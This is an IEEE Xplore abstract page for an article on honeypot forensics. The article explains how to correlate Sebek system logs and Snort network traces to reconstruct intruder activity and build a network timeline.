By Topic

Honeypot forensics part 1: analyzing the network

Sign In

Cookies must be enabled to login.After enabling cookies , please use refresh or reload or ctrl+f5 on the browser for the login options.

Formats Non-Member Member
$31 $13
Learn how you can qualify for the best price for this item!
Become an IEEE Member or Subscribe to
IEEE Xplore for exclusive pricing!
close button

puzzle piece

IEEE membership options for an individual and IEEE Xplore subscriptions for an organization offer the most affordable access to essential journal articles, conference papers, standards, eBooks, and eLearning courses.

Learn more about:

IEEE membership

IEEE Xplore subscriptions

4 Author(s)

A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former we want new ways to discover rootkits, Trojans, and potential zero-day exploits. For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces so that we learn every single action the intruder made. The most common tools for doing this are Sebek for system events and Snort for network activity. Unfortunately, there is no easy way to correlate information from these sources, which complicates honeypot forensics. Although computer forensics focuses on analyzing a system once we suspect it has been compromised, we expect honeypots to be compromised. Thus, honeypot forensics focuses on understanding the blackhat's techniques and tools, before and after its intrusion on the honeypot. The article looks at: network activity analysis; building the network timeline; and tools and techniques.

Published in:

Security & Privacy, IEEE  (Volume:2 ,  Issue: 4 )